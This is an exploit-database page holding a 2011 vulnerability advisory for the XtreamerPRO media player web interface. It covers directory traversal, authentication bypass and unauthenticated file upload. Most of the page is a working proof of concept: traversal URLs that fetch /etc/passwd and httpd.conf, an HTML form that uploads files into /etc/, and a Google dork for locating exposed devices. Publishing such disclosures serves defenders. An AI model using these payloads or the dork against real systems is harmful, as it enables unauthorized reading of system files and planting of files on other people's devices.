[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : XtreamerPRO Media-player Multiple Vulnerabilities
# Published : 2011-05-16
# Author : Itzik Chen
# Previous Title : DreamBox DM500(+) Arbitrary File Download Vulnerability
# Next Title : 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow


			
# Exploit Title: XtreamerPRO Media-player and streamer multiple vulnerabilities# Google Dork: intitle:Xtreamer Media Server + "2009 Xtreamer.net, All right reserved."# Date: 15/05/2011# Author: Itzik Chen# Software Link: www.xtreamer.net# Version: ver 2.6.0, 2.7.0# Tested on: Windows XP SP3 EngSummary================XtreamerPro is a popular media-player and streamer withan optional web interface management.Description================XtreamerPro suffers from a directory traversal with appending the '/' character in the HTTP GET method of theaffected host address. XtreamerPro also prone to an authentication bypass vulnerability. This vulnerability can be exploited by remote attackers to access sensitivedata on the server without being authenticated. The attackercan also upload files to any location on the server, withoutbeing authenticated, using a multipart/form-data post.Proof of Concept================directory traversal:http://192.168.2.100/otherlist.php?dir=/%2f../%2f../etc/passwdhttp://192.168.2.100/otherlist.php?dir=/%2f../%2f../etc/httpd.confAuthentication bypass:http://192.168.2.100/download.php?dir=/%2f../%2f../etc/&file=passwdhttp://192.168.2.100/download.php?dir=/%2f../%2f../etc/&file=httpd.confAuthentication bypass - upload file:<form id="form1" name="write_form" action="http://192.168.2.100/upload_file.php?dir=/%2f../%2f../etc/" method="post" enctype="multipart/form-data"> 	<INPUT TYPE=FILE name="Filedata" id="Filedata">	<input type=submit></form> DEMO video:http://www.youtube.com/watch?v=QZtiuYyA8XU